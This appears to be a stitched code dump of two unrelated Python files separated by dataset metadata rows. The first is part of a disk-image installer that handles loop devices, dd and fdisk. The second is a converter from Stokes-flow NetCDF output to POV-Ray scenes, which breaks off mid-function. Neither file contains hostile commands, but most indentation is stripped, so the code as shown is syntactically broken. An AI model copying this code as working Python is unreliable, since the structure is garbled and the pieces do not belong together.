from my.installer.rscripts import MAXIMUM_LIKELY_BOOT_PARTITION_SIZE_IN_MB, APT_GET_OPTIONALPKGS, APT_GET_PACKAGES, PIP3PACKAGES
from my.miscellany import call_binary, system_or_die, generate_temporary_filename, chroot_this, sleep
def dissociate_loopdevs_en_masse(attempts=3):
for i in range(0, 32):
os.system("umount /dev/loop%d 2> /dev/null " % i)
free_up_loopdev('/dev/loop%d' % i, attempts=attempts, silent=True)
def generate_128MB_randomized_data_file(random_data_fname):
os.system('''
fname=%s
dd if=/dev/urandom of=$fname bs=1024k count=8 2>/dev/null
cat $fname $fname $fname $fname > $fname.big 2>/dev/null
sync
cat $fname.big $fname.big $fname.big $fname.big > $fname 2>/dev/null
sync
rm -f $fname.big
''' % random_data_fname)
def download_pristine_copy_of_the_OS(downloaded_pristine_image_xz):
# print('''Beginning step 0; mtpt="%s"; goldenf="%s"; our_working_image="%s"''' % (mtpt, goldenf, our_working_image))
if not os.path.exists(downloaded_pristine_image_xz):
raise SystemError('%s not found; NEFARIOUS PORPOISES; re-enable downloader, please.' % downloaded_pristine_image_xz)
# rm -f $destfile
# echo "*** Downloading pristine OS ***"
# mount | grep "$mtpt" && echo "WARNING --- mountpoint is still mounted (start of part 0)" || true
# losetup $loopdev 2>/dev/null && die "Loop device is loopy. Why? (start of part 0)" || true
# # Have we downloaded and compressed a pristine disk image yet? (By 'pristine,' I mean 'freshly
# # downloaded from the RPi3/ODroid/NanoPi website.') If we haven't, let's do that now.
# if [ ! -e "$DOWNLOADED_PRISTINE_IMAGE.xz" ] ; then
# echo "$DOWNLOADED_PRISTINE_IMAGE.xz not found; NEFARIOUS PORPOISES; re-enable please_download_pristine_image() eventually."
# exit 111
# please_download_pristine_image $DOWNLOADED_PRISTINE_IMAGE $pristine_url
# rm -f $GOLDENF.xz
# else
# echo "$DOWNLOADED_PRISTINE_IMAGE.xz exists. Good."
# fi
# losetup $loopdev 2>/dev/null && die "Loop device is loopy. Why? (end of part 0)" || true
# fi
#
def free_up_loopdev(sparedev, attempts=3, silent=True):
if not silent:
print("Freeing up %s" % sparedev)
os.system('umount %s 2> /dev/null' % sparedev)
while attempts >= 0 and 0 == os.system('losetup | grep "%s " >/dev/null 2>/dev/null' % sparedev):
attempts -= 1
if not silent:
print('Waiting for %s to become free...' % sparedev)
os.system('umount %s 2> /dev/null' % sparedev)
os.system('sync;sync;sync; losetup -d %s 2>/dev/null; sync;sync;sync' % sparedev)
sleep(.5)
if 0 == os.system('losetup | grep %s >/dev/null 2>/dev/null' % sparedev):
print("Warning - failed to dissociated %s" % sparedev)
elif not silent:
print('%s is free. Good.' % sparedev)
def get_a_spare_loopdev():
spare_loopdev = None
for i in range(0, 32):
a_loopdev = '/dev/loop%d' % i
if 0 != os.system('losetup %s > /dev/null 2> /dev/null' % a_loopdev):
spare_loopdev = a_loopdev
break
    if spare_loopdev is None:
        raise CannotFindSpareLoopdevError('Unable to find a spare /dev/loop entry')
return spare_loopdev
def get_total_RAM_in_MB():
retcode, textout = call_binary(['free'])
if 0 != retcode:
raise ExternalCallBinaryError("Failed to get total RAM in MB")
return int(textout.split('\n')[1].split(':')[1].strip(' ').split(' ')[0])
# def is_this_my_first_run():
# return False if os.path.exists(HOSTAPDCONF_FNAME) else True
def get_all_partitions_lines_from_fdisk(imagef):
retcode, textout = call_binary(['fdisk', '-l', imagef])
if 0 != retcode:
raise ExternalCallBinaryError("Failed to get fdisk info")
fdisk_output = textout.split('\n')
return [r for r in fdisk_output if r.split(' ')[0].find('/') == 0]
def get_sector_size(imagef):
retcode, textout = call_binary(['fdisk', '-l', imagef])
if 0 != retcode:
raise ExternalCallBinaryError("Failed to run fdisk -l")
fdisk_output = textout.split('\n')
return int([r for r in fdisk_output if r.find(' * ') >= 0 and r.find(':') >= 0][0].split('=')[1].strip(' ').split(' ')[0])
def calculate_sectorsize_and_partition_size_and_stuff(imagef):
'''
diskinfo.sectorsize size of each sector (usually 512 bytes)
diskinfo.noof_parts how many partitions are there?
diskinfo.root_partno which partition# is root?
diskinfo.boot_partno which partition# is boot?
diskinfo.usr_partno which partition# is usr?
    diskinfo.partitions      info on specific partitions
diskinfo.partitions[1].start_sector
diskinfo.partitions[1].start_in_bytes
diskinfo.partitions[1].end_sector
diskinfo.partitions[1].size_in_bytes
diskinfo.partitions[1].format_hexcode
diskinfo.partitions[1].format_name
...etc...
'''
diskinfo = Object()
all_lines = get_all_partitions_lines_from_fdisk(imagef)
diskinfo.sectorsize = get_sector_size(imagef)
diskinfo.boot_partno = None
diskinfo.root_partno = None
diskinfo.usr_partno = None
diskinfo.noof_parts = len(all_lines)
diskinfo.partitions = [None, None, None, None, None, None, None, None, None, None, None,
None, None, None, None, None, None, None, None, None, None, None, None, None, None]
for this_line in all_lines:
# <diskimage fname><partno> (*?) <start> <end> <sectors> <size in text> <format_hexcode> <format_name>
        # collapse the optional '*' boot flag and runs of whitespace to single spaces
        this_line = ' '.join(this_line.replace(' * ', ' ').split())
fname_and_partno, start_sector, end_sector, noof_sectors, size_str, format_hexcode = this_line.split(' ')[:6]
format_name = ''.join([r + ' ' for r in this_line.split(' ')[7:]])
partno = int(fname_and_partno.split(imagef)[1])
diskinfo.partitions[partno] = Object()
diskinfo.partitions[partno].start_sector = int(start_sector)
diskinfo.partitions[partno].end_sector = int(end_sector)
diskinfo.partitions[partno].noof_sectors = int(noof_sectors)
diskinfo.partitions[partno].size_str = size_str
diskinfo.partitions[partno].format_hexcode = format_hexcode
diskinfo.partitions[partno].format_name = format_name
diskinfo.partitions[partno].start_in_bytes = diskinfo.partitions[partno].start_sector * diskinfo.sectorsize
diskinfo.partitions[partno].size_in_bytes = diskinfo.partitions[partno].noof_sectors * diskinfo.sectorsize
diskinfo.partitions[partno].size_in_MBs = diskinfo.partitions[partno].size_in_bytes / 1024 / 1024
if diskinfo.root_partno is None and diskinfo.boot_partno is None\
and diskinfo.partitions[partno].size_in_MBs <= MAXIMUM_LIKELY_BOOT_PARTITION_SIZE_IN_MB:
# print('Partition #%d is probably /boot' % partno)
diskinfo.boot_partno = partno
elif diskinfo.root_partno is None:
# print('Partition #%d is probably root' % partno)
diskinfo.root_partno = partno
elif diskinfo.usr_partno is None:
# print('Partition #%d is probably /usr' % partno)
diskinfo.usr_partno = partno
else:
raise WhatDoIDoWithThisPartitionError("I do not know what to do with partition #%d of %s; \
surely we have found all the partitions already; what is this sorcery?" % (partno, imagef))
return diskinfo
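# Illustrative sketch (assumption: 'disk.img' is an existing image file):
#   info = calculate_sectorsize_and_partition_size_and_stuff('disk.img')
#   print('%d partition(s), %d-byte sectors; root is partition #%s'
#         % (info.noof_parts, info.sectorsize, info.root_partno))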
class Object(object):
pass
# def DOWNLOADED_PRISTINE_IMAGE(imagefile, storage_folder):
# if 0 != os.system('''
#     local imagefile=%s our_mtpt=$WONKADIR/tmp/our_mtpt.$RANDOM$RANDOM storage_folder=%s
# mkdir -p $our_mtpt
# mount_the_disk_image $imagefile $our_mtpt
# umount $our_mtpt/{dev/pts,dev,proc,tmp,var,sys,proc} 2> /dev/null || true
# cd $our_mtpt
# echo "Making a copy of the filesystem from the original image file --- from $our_mtpt to $storage_folder"
# mkdir -p $storage_folder
# cp -af * $storage_folder/
# cd /
# unmount_disk_image $our_mtpt
# rmdir $our_mtpt || true''' % (imagefile, storage_folder)):
# raise SystemError("Failed to download pristine image")
def copy_first_few_MB_of_existing_imagefile_and_add_zeros_to_pad_it_out(imagefile, truncatedimgfile, finalsizeofourimage):
print("Creating truncated copy of existing imagefile")
os.system('dd if=%s of=%s bs=1024k count=%d' % (imagefile, truncatedimgfile, finalsizeofourimage))
os.system('''
truncatedimgfile=%s
finalsizeofourimage=%d
echo -en "Adding zeroes to end of pristine file, to pad it out"
while [ "$(($(ls -l $truncatedimgfile | tr -s '\t' ' ' | cut -d' ' -f5)/1024/1024))" -lt "$finalsizeofourimage" ] ; do
echo -en "."
dd if=/dev/zero bs=1024 count=8192 >> $truncatedimgfile 2> /dev/null # Don't use conv=sparse, please. Don't.
[ "$?" -eq "0" ] || echo "Failed to finish resizing image. Did we run out of disk space?"
done
echo "...Padded. Yay."
''' % (truncatedimgfile, finalsizeofourimage))
def please_download_pristine_image(downloaded_pristine_image, pristine_url):
raise SystemError('not written yet')
'''
local DOWNLOADED_PRISTINE_IMAGE="$1" pristine_url="$2"
rm -f "$DOWNLOADED_PRISTINE_IMAGE"
echo "Downloading pristine image"
if echo "$pristine_url" | grep -F .tar.xz >/dev/null ; then
suffix=tar.xz
die "I have no idea how to handle .tar.xz endings. This may be an eMMC thing. Help!"
elif echo "$pristine_url" | grep -F .xz >/dev/null ; then
suffix=xz
elif echo "$pristine_url" | grep -F .gz >/dev/null ; then
suffix=gz
elif echo "$pristine_url" | grep -F .7z >/dev/null ; then
suffix=7z
elif echo "$pristine_url" | grep -F .zip >/dev/null ; then
suffix=zip
else
die "Failed to handle type of compression that $DOWNLOADED_PRISTINE_IMAGE.* uses."
fi
rm -f "$DOWNLOADED_PRISTINE_IMAGE".$suffix.tmp
die "wget $pristine_url -O "$DOWNLOADED_PRISTINE_IMAGE".$suffix.tmp"
mv -f "$DOWNLOADED_PRISTINE_IMAGE".$suffix.tmp "$DOWNLOADED_PRISTINE_IMAGE".$suffix
echo "Unzipping it"
if [ "$suffix" = "xz" ] ; then
xz -d "$DOWNLOADED_PRISTINE_IMAGE".$suffix
elif [ "$suffix" = "gz" ] ; then
gunzip "$DOWNLOADED_PRISTINE_IMAGE".$suffix
elif [ "$suffix" = "7z" ] ; then
mkdir -p $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa
7z x -o$(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa "$DOWNLOADED_PRISTINE_IMAGE".7z
mv $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa/*.* "$DOWNLOADED_PRISTINE_IMAGE"
rmdir $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa/*
rmdir $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa || true
elif [ "$suffix" = "zip" ] ; then
mkdir -p $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa
unzip "$DOWNLOADED_PRISTINE_IMAGE".zip -d $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa
mv $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa/*.* "$DOWNLOADED_PRISTINE_IMAGE"
rmdir $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa/*
rmdir $(dirname "$DOWNLOADED_PRISTINE_IMAGE")/aaaaa || true
else
die "Failed to handle type of compression that $DOWNLOADED_PRISTINE_IMAGE.* uses."
fi
[ -e "$DOWNLOADED_PRISTINE_IMAGE" ] || die "Unable to decompress $DOWNLOADED_PRISTINE_IMAGE image"
echo "Compressing it (again)"
pv -p $DOWNLOADED_PRISTINE_IMAGE | xz -5e > $DOWNLOADED_PRISTINE_IMAGE.xz
rm -f $DOWNLOADED_PRISTINE_IMAGE $DOWNLOADED_PRISTINE_IMAGE.$suffix
echo "Finished compressing it. We now have a (usable) pristine disk image."
'''
# ------------------------------------------------------------------------------------------------------------------------------------------------------------
if __name__ == "__main__":
raise SystemExit('Do not run me!')
|
gpl-3.0
| -8,482,496,389,659,124,000
| 47.07717
| 158
| 0.617442
| false
| 3.209272
| false
| false
| false
|
kichiki/stokes
|
python/stnc2pov.py
|
1
|
25797
|
# stokes-netcdf to pov converter
# Copyright (C) 2006-2008 Kengo Ichiki <kichiki@users.sourceforge.net>
# $Id: stnc2pov.py,v 1.9 2008/06/03 02:57:43 kichiki Exp $
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
import sys
#sys.path.append('/somewhere/ryuon/stokes/python')
import stokes
def write_T_Balls(f, n):
f.write('#declare T_Ball_%d = texture {\n'%(n))
f.write(' pigment {\n'\
' image_map {\n'\
' jpeg \"textures/%d.jpg\"\n'\
' map_type 1\n'\
' interpolate 2\n'\
' }\n'\
' rotate <0, 270, 0>\n'\
' }\n'%(n))
f.write(' finish {\n'\
' phong 0.9\n'\
' ambient 0.5\n'\
' reflection 0.2\n'\
' }\n'\
'}\n')
def write_T_Particle(f):
f.write('#declare T_Particle = texture {\n'\
' pigment { color White }\n'\
' //finish { ambient 0.2 diffuse 0 reflection 0.6 }\n'\
' finish {\n'\
' ambient .1\n'\
' diffuse .1\n'\
' specular 1\n'\
' roughness .001\n'\
' metallic\n'\
' reflection {\n'\
' .75\n'\
' metallic\n'\
' }\n'\
' }\n'\
'}\n')
def write_T_Particles_with_Bonds(f, color):
f.write('#declare T_Particles_with_Bonds = texture {\n'\
' pigment { color %s }\n'\
' finish {\n'\
' ambient .1\n'\
' diffuse .4\n'\
' reflection {\n'\
' .75\n'\
' metallic\n'\
' }\n'\
' specular 1\n'\
' }\n'\
'}\n'%(color))
def write_M_RYUON(f):
# M_RYUON
f.write('#declare M_RYUON = material {\n'\
' texture {\n'\
' pigment {\n'\
' color <0.4, 0.5, 1.0>\n'\
' filter 1\n'\
' }\n'\
' finish {\n'\
' ambient 0\n'\
' diffuse 0\n'\
' reflection .25\n'\
' specular 1\n'\
' roughness .001\n'\
' }\n'\
' } // end of texture\n'\
' interior { ior 1.33 }\n'
'}\n')
def write_T_CHECKER(f):
f.write('#declare T_CHECKER = texture {\n'\
' pigment{\n'\
' checker\n'\
' color <0.4, 0.5, 1.0>\n'\
' color White\n'\
' }\n'\
' scale 0.01\n'\
' finish{\n'\
' phong 0.9\n'\
' metallic\n'\
' }\n'\
'}\n')
def bounding_box (np, x):
(cx,cy,cz) = (0.0, 0.0, 0.0)
for i in range(np):
xx = x[i*3]
yy = x[i*3+1]
zz = x[i*3+2]
cx = cx + xx
cy = cy + yy
cz = cz + zz
if i == 0:
lx0 = lx1 = xx
ly0 = ly1 = yy
lz0 = lz1 = zz
else:
if lx0 > xx:
lx0 = xx
if lx1 < xx:
lx1 = xx
if ly0 > yy:
ly0 = yy
if ly1 < yy:
ly1 = yy
if lz0 > zz:
lz0 = zz
if lz1 < zz:
lz1 = zz
cx = cx / float(np)
cy = cy / float(np)
cz = cz / float(np)
lx = lx1 - lx0
ly = ly1 - ly0
lz = lz1 - lz0
return (cx,cy,cz, lx,ly,lz)
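# Worked example (illustrative): two particles at (0,0,0) and (2,4,6) give
# center (1.0, 2.0, 3.0) and extents (2.0, 4.0, 6.0):
#   bounding_box(2, [0.0, 0.0, 0.0, 2.0, 4.0, 6.0])
#   -> (1.0, 2.0, 3.0, 2.0, 4.0, 6.0)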
# INPUT
# f : file
# lattice = (lx,ly,lz) in simulation coordinates
# camera = (cx,cy,cz)
# lookat = (lax,lay,laz)
# flag_ball : 0 => checker, 1 => pool balls
# flag_bonds :
# bond_color : '' is accepted (for Red)
def write_pov_header (f, lattice, camera, lookat,
flag_ball=0, flag_bonds=0, bond_color=''):
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
# scale factor = 1/100 (0.01 radius = 1 in POV)
lx = lattice[0]/100.0
lz = lattice[1]/100.0
ly = lattice[2]/100.0
cx = camera[0]/100.0
cz = camera[1]/100.0
cy = camera[2]/100.0
lax = lookat[0]/100.0
laz = lookat[1]/100.0
lay = lookat[2]/100.0
if flag_bonds == 0:
f.write('#include "colors.inc"\n')
#f.write('#include "woods.inc"\n\n')
# place the ground
f.write('// floor\nplane {\n'\
' y, -0.1\n'\
' texture {\n'\
#' T_Wood6\n'\
#' finish{ ambient 1 }\n'\
' pigment { checker color White, color <.7, .7, .7> }\n'\
' scale .3\n'\
' finish{ ambient .4 }\n'\
' }\n'\
'}\n')
# place the walls
f.write('// back wall\n'\
'plane {\n'\
' z, 1\n'\
' pigment { color rgb <1,1,0.8> }\n'\
' finish{ ambient 0.4 }\n'\
'}\n')
f.write('// ceiling\n'\
'plane {\n'\
' y, 5\n'\
' pigment { color White }\n'\
'}\n')
f.write('// right wall\n'\
'plane {\n'\
' x, 5\n'\
' pigment { color White }\n'\
'}\n')
f.write('// left wall\n'\
'plane {\n'\
' x, -5\n'\
' pigment { color White }\n'\
'}\n')
f.write('// behind wall\n'\
'plane {\n z, -5\n'\
' pigment { color White }\n'\
'}\n\n')
# place the box
f.write('box {\n'\
' <0, 0, 0>, // Near lower left corner\n'\
' <%f, %f, %f> // Far upper right corner\n'\
' pigment { color rgbf <0.9, 0.99, 1, 1> }\n'\
'}\n\n'%(lx, ly, lz))
f.write('camera {\n location <%f, %f, %f>\n'%(cx, cy, cz))
f.write(' look_at <%f, %f, %f>\n}\n\n'%(lax, lay, laz))
f.write('light_source { <2, 4.9, -3> color White}\n\n')
write_T_Particle(f)
else:
f.write('#include "colors.inc"\n')
f.write('background { color White }\n')
f.write('camera {\n location <%f, %f, %f>\n'%(cx, cy, cz))
f.write(' look_at <%f, %f, %f>\n}\n\n'%(lax, lay, laz))
f.write('light_source { <2, 4.9, -3> color White}\n\n')
write_T_Particle(f)
if bond_color == '':
write_T_Particles_with_Bonds(f, 'Red')
else:
write_T_Particles_with_Bonds(f, bond_color)
if flag_ball == 0:
write_M_RYUON (f)
write_T_CHECKER(f)
else:
for i in range(16):
write_T_Balls(f,i)
# INPUT
# f : file
# lattice = (lx,ly,lz) in simulation coordinates
# camera = (cx,cy,cz)
# lookat = (lax,lay,laz)
# flag_ball : 1 => pool balls
# flag_bonds :
# bond_color : '' is accepted (for Red)
def write_pov_header_open (f, lattice, camera, lookat,
flag_ball=0, flag_bonds=0, bond_color=''):
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
# scale factor = 1/100 (0.01 radius = 1 in POV)
lx = lattice[0]/100.0
lz = lattice[1]/100.0
ly = lattice[2]/100.0
cx = camera[0]/100.0
cz = camera[1]/100.0
cy = camera[2]/100.0
lax = lookat[0]/100.0
laz = lookat[1]/100.0
lay = lookat[2]/100.0
f.write('#include \"colors.inc\"\n')
f.write('#include "woods.inc"\n\n')
if flag_bonds == 0:
# place the walls
f.write('// back wall\n'\
'plane {\n'\
' z, 2\n'\
' pigment { checker color White, color <0.6, 0.8, 1> }\n'\
' scale 0.1\n}\n')
f.write('// behind wall\n'\
'plane {\n'\
' z, -5\n'\
' pigment { color White }\n'\
'}\n\n')
f.write('camera {\n location <%f, %f, %f>\n'%(cx, cy, cz))
f.write(' look_at <%f, %f, %f>\n}\n\n'%(lax, lay, laz))
f.write('light_source { <2, 4.9, -3> color White}\n\n')
write_T_Particle(f)
else:
f.write('#include "colors.inc"\n')
f.write('background { color White }\n')
f.write('camera {\n location <%f, %f, %f>\n'%(cx, cy, cz))
f.write(' look_at <%f, %f, %f>\n}\n\n'%(lax, lay, laz))
f.write('light_source { <2, 4.9, -3> color White}\n\n')
write_T_Particle(f)
if bond_color == '':
write_T_Particles_with_Bonds(f, 'Red')
else:
write_T_Particles_with_Bonds(f, bond_color)
if flag_ball == 0:
write_M_RYUON (f)
write_T_CHECKER(f)
else:
for i in range(15):
write_T_Balls(f,i+1)
def write_pov_particle (f, x, y, z, a):
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
# scale factor = 1/100 (0.01 radius = 1 in POV)
f.write('sphere {\n')
f.write(' <%f, %f, %f>, %f\n'%(x/100.0, z/100.0, y/100.0, a/100.0))
f.write(' material { M_RYUON }\n}\n')
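# Example (editor's note): with the 1/100 scale above,
#   write_pov_particle(f, 100, 0, 0, 1)
# emits a sphere at <1, 0, 0> with radius 0.01; note that y and z are
# swapped on output to match POV-Ray's vertical axis.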
def write_pov_particle_fixed (f, x, y, z, a):
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
# scale factor = 1/100 (0.01 radius = 1 in POV)
f.write('sphere {\n')
f.write(' <%f, %f, %f>, %f\n'%(x/100.0, z/100.0, y/100.0, a/100.0))
f.write(' texture { T_Particle }\n}\n')
def write_pov_particles_with_bonds (f, nm, pos, a, br):
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
# scale factor = 1/100 (0.01 radius = 1 in POV)
# all objects are merged
f.write('merge {\n')
# sheres
for j in range(nm):
if a == []: rad = 1.0
else: rad = a[j]
x = pos[j*3]
y = pos[j*3+1]
z = pos[j*3+2]
f.write(' sphere {\n')
f.write(' <%f, %f, %f>, %f\n'\
%(x/100.0, z/100.0, y/100.0, rad/100.0))
f.write(' }\n')
# bonds
for j in range(nm-1):
if a == []: rad = 1.0
else: rad = a[j]
if br > 0.0:
rad = br / 100.0
else:
# set cylinder's radius the half
rad = 0.5 * rad / 100.0
x0 = pos[j*3 ] / 100.0
y0 = pos[j*3+1] / 100.0
z0 = pos[j*3+2] / 100.0
x1 = pos[(j+1)*3 ] / 100.0
y1 = pos[(j+1)*3+1] / 100.0
z1 = pos[(j+1)*3+2] / 100.0
f.write(' cylinder {\n')
f.write(' <%f, %f, %f>, <%f, %f, %f>, %f\n'\
%(x0, z0, y0, x1, z1, y1, rad))
f.write(' }\n')
f.write(' texture { T_Particles_with_Bonds }\n')
f.write('}\n')
# make transform matrix (3x3) by quaternion
def Q2M (q1,q2,q3,q4):
m = []
# parity change
q4 *= -1.0
m.append(2.0*(q1*q1 + q4*q4 - .5))
m.append(2.0*(q1*q2 + q3*q4))
m.append(2.0*(q1*q3 - q2*q4))
m.append(2.0*(q1*q2 - q3*q4))
m.append(2.0*(q2*q2 + q4*q4 - .5))
m.append(2.0*(q2*q3 + q1*q4))
m.append(2.0*(q1*q3 + q2*q4))
m.append(2.0*(q2*q3 - q1*q4))
m.append(2.0*(q3*q3 + q4*q4 - .5))
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
t = [1.0, 0.0, 0.0,\
0.0, 0.0, 1.0,\
0.0, 1.0, 0.0]
x = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
y = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
for i in range(3):
for j in range(3):
for k in range(3):
x[i*3+j] += t[i*3+k] * m[k*3+j]
for i in range(3):
for j in range(3):
for k in range(3):
y[i*3+j] += x[i*3+k] * t[k*3+j]
# therefore, Y = T . M . T
return y
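# Editor's sketch: a minimal sanity check for Q2M. The identity quaternion
# should come back as the identity matrix, because the axis-swap matrix T
# is its own inverse (T . I . T = I). This helper is not part of the
# original script.
def _check_Q2M_identity():
    m = Q2M(0.0, 0.0, 0.0, 1.0)
    expected = [1.0, 0.0, 0.0,
                0.0, 1.0, 0.0,
                0.0, 0.0, 1.0]
    assert all(abs(u - v) < 1e-12 for u, v in zip(m, expected))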
def write_pov_particle_Q (f, x, y, z, a, q):
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
# scale factor = 1/100 (0.01 radius = 1 in POV)
m = Q2M (q[0], q[1], q[2], q[3])
f.write('sphere {\n')
f.write(' <0, 0, 0>, %f\n'%(a/100.0))
f.write(' texture { T_CHECKER }\n')
f.write(' transform {\n')
f.write(' matrix <%f, %f, %f,\n'%(m[0], m[3], m[6]))
f.write(' %f, %f, %f,\n'%(m[1], m[4], m[7]))
f.write(' %f, %f, %f,\n'%(m[2], m[5], m[8]))
f.write(' %f, %f, %f> }\n'%(x/100.0, z/100.0, y/100.0))
f.write('}\n')
def write_pov_particle_Balls_Q (f, x, y, z, a, q, i):
n = i%15 + 1
# note that in POVRAY,
# y is the vertical direction
# z is the depth direction
# scale factor = 1/100 (0.01 radius = 1 in POV)
m = Q2M (q[0], q[1], q[2], q[3])
f.write('sphere {\n')
f.write(' <0, 0, 0>, %f\n'%(a/100.0))
f.write(' texture { T_Ball_%d }\n'%(n))
f.write(' transform {\n')
f.write(' matrix <%f, %f, %f,\n'%(m[0], m[3], m[6]))
f.write(' %f, %f, %f,\n'%(m[1], m[4], m[7]))
f.write(' %f, %f, %f,\n'%(m[2], m[5], m[8]))
f.write(' %f, %f, %f> }\n'%(x/100.0, z/100.0, y/100.0))
f.write('}\n')
# now camera angle
# init: <0.17, 0.50, -1.10> <0.17, 0.50, 0.0>
# target: <0.17, 0.22, -0.28> <0.17, 0.15, 0.0>
# those are in POVRAY coordinates
# in simulation coordinates,
# init: <17, -110, 50> <17, 0, 50>
# target: <17, -28, 22> <17, 0, 15>
# diff < 0, 82, -28> < 0, 0, -35>
# let's say target is reached in the first 200 steps
# d/step= < 0, .41,-.14> < 0, 0,-.175>
def move_camera (camera, lookat):
if (camera[2] <= 22.0): return
camera[1] += .41
camera[2] -= .14
lookat[2] -= .175
def usage():
print '$Id: stnc2pov.py,v 1.9 2008/06/03 02:57:43 kichiki Exp $'
print 'USAGE:'
print '\t-f or --file : stokes-nc-file'
print '\t-o or --out : output filename'
print '\t-ball : use pool balls'
print '\t-bonds : connect particles with bonds'
print '\t-br : radius of bond cylinder'
print '\t-bc : bond color (default: Red)\n'\
'\t\t ex.1 -bc \'rgb <0, .5, 1>\'\n'\
'\t\t ex.2 -bc \'color red 0.623529 green 0.623529 blue 0.372549\'\n'
print '\t-step n : output the config only at the step n\n'\
'\t\t n starts from 1 and ends at 1001 for 1000-step run.\n'
print '\t-nsteps n : output every n steps\n'
print '\t-sphere r : draw sphere with radius r'
print '\t-cylinder r : draw cylinder with radius r'
print '\t-camera r : set the distance to the camera by r'
print '\t-top : the top-view (default: side view)'
print '\t-bottom : the bottom-view (default: side view)'
print '\t-lookat x y z : set the lookat point fixed by (x,y,z)'
sys.exit ()
def render_one_step(str_argv, outfile, i,
nc, pos, a, q, xf0, af, lattice,
flag_ball, flag_bonds, bond_radius, bond_color,
flag_lookat, lk_arg, camera_dist, camera_dir,
sphere_radius, cylinder_radius, flag_bb):
file = '%s-%05d.pov'%(outfile, i)
try:
f = open(file, 'w')
except IOError:
print 'cannot open', file
sys.exit()
# write argv[0]
f.write('/* generated for %d step by\n'%(i))
f.write(' * %s\n'%(str_argv))
f.write(' */\n')
stokes.stokes_nc_get_data (nc, "x", i, pos)
# set camera direction
(cx,cy,cz, lx,ly,lz) = bounding_box (nc.np, pos)
if flag_lookat == 0:
if cylinder_radius > 0.0:
# only x is adjustable
lk = [cx, 0, 0]
else:
lk = [cx, cy, cz]
else:
lk = [lk_arg[0], lk_arg[1], lk_arg[2]]
if camera_dir == 'top':
# top view
if camera_dist == 0.0:
if lx > ly:
l = lx
else:
l = ly
            # prevent the camera from going too far away
if l > 50: l = 50
camera = [lk[0], lk[1], lk[2]+2*l]
else:
camera = [lk[0], lk[1], lk[2]+camera_dist]
elif camera_dir == 'bottom':
# bottom view
if camera_dist == 0.0:
if lx > ly:
l = lx
else:
l = ly
            # prevent the camera from going too far away
if l > 50: l = 50
camera = [lk[0], lk[1], lk[2]-2*l]
else:
camera = [lk[0], lk[1], lk[2]-camera_dist]
else:
# side view
if camera_dist == 0.0:
if lx > lz:
l = lx
else:
l = lz
            # prevent the camera from going too far away
if l > 50: l = 50
camera = [lk[0], lk[1]-2*l, lk[2]]
else:
camera = [lk[0], lk[1]-camera_dist, lk[2]]
# write header part
if lattice[0] == 0.0 and lattice[1] == 0.0 and lattice[2] == 0.0:
# non-periodic boundary
write_pov_header_open (f, lattice, camera, lk,
flag_ball, flag_bonds, bond_color)
else:
# periodic boundary
#move_camera (camera, lk)
write_pov_header (f, lattice, camera, lk,
flag_ball, flag_bonds, bond_color)
if flag_bb != 0:
# write bounding box for periodic system
if lattice[0] != 0.0 or lattice[1] != 0.0 or lattice[2] != 0.0:
f.write('box {\n')
f.write(' <0, 0, 0>,\n')
f.write(' <%f, %f, %f>\n'\
%(lattice[0]/100.0, lattice[2]/100.0, lattice[1]/100.0))
f.write(' pigment {\n')
f.write(' rgbf <.9,1,.9, .95>\n')
f.write(' }\n')
f.write(' finish {\n')
f.write(' ambient .2\n')
f.write(' diffuse .6\n')
f.write(' }\n')
f.write('}\n')
# write confinement
if sphere_radius > 0.0:
# draw sphere
f.write('sphere {\n')
f.write(' <0, 0, 0>, %f\n'%(sphere_radius/100.0)) # scale factor 100
f.write(' pigment {\n')
f.write(' rgbf <.9,1,.9, .95>\n')
f.write(' }\n')
f.write(' finish {\n')
f.write(' ambient .2\n')
f.write(' diffuse .6\n')
f.write(' }\n')
f.write('}\n')
if cylinder_radius > 0.0:
# draw cylinder
f.write('cylinder {\n')
f.write(' <%f, 0, 0>,\n'%((cx-lx)*0.01)) # scale factor 0.01
f.write(' <%f, 0, 0>,\n'%((cx+lx)*0.01)) # scale factor 0.01
f.write(' %f\n'%(cylinder_radius*0.01)) # scale factor 0.01
f.write(' pigment {\n')
f.write(' rgbf <.9,1,.9, .95>\n')
f.write(' }\n')
f.write(' finish {\n')
f.write(' ambient .2\n')
f.write(' diffuse .6\n')
f.write(' }\n')
f.write('}\n')
# write mobile particles
if flag_bonds == 0:
# no bond
if nc.flag_q != 0:
# with quaternion
stokes.stokes_nc_get_data (nc, "q", i, q)
for j in range(nc.np):
x = pos[j*3]
y = pos[j*3+1]
z = pos[j*3+2]
if a != []:
rad = a[j]
else:
rad = 1.0
if flag_ball == 0:
write_pov_particle_Q (f, x, y, z, rad,\
[q[j*4+0],q[j*4+1],\
q[j*4+2],q[j*4+3]])
else:
write_pov_particle_Balls_Q (f, x, y, z, rad,\
[q[j*4+0],q[j*4+1],\
q[j*4+2],q[j*4+3]],\
j)
else:
# no quaternion
for j in range(nc.np):
x = pos[j*3]
y = pos[j*3+1]
z = pos[j*3+2]
if a != []:
